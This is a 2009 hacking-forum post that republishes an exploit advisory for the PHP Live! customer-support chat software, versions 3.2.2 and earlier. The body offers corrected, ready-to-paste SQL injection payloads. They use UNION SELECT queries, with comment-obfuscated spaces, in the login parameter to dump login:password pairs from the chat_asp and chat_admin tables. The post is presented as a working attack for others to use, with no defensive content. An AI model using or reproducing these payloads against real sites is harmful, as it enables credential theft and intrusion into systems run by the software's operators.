Multi Ethnic Hacking Group

    PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability


    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability Empty PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability

    Post by Foxi on Sat Jul 25, 2009 11:45 am

    Original author: Found by Xar of h4ck-y0u, Greets to Don & ViSiOn
    Modified version: skys
    Contact: skysbsb[at]


    PHP Live! (©️ OSI Codes Inc.) enables live help and live customer support
    communication directly from your website. With PHP Live!, you can
    provide one-on-one chat assistance in real-time, answer visitor
    questions and add that extra human touch to your website.

    [!]SQL Injection[!]
    The original code was a little mistake, the right code:

    Set the proper l(login) var in the parameter request.
    In this example, l=admin**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_asp%20limit%200,1

    In the Answer field, you will see the login:password for the

    or, if you want to mess only just with the operators,**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1

    # [2009-07-24]

      Current date/time is Mon Jun 17, 2019 7:22 am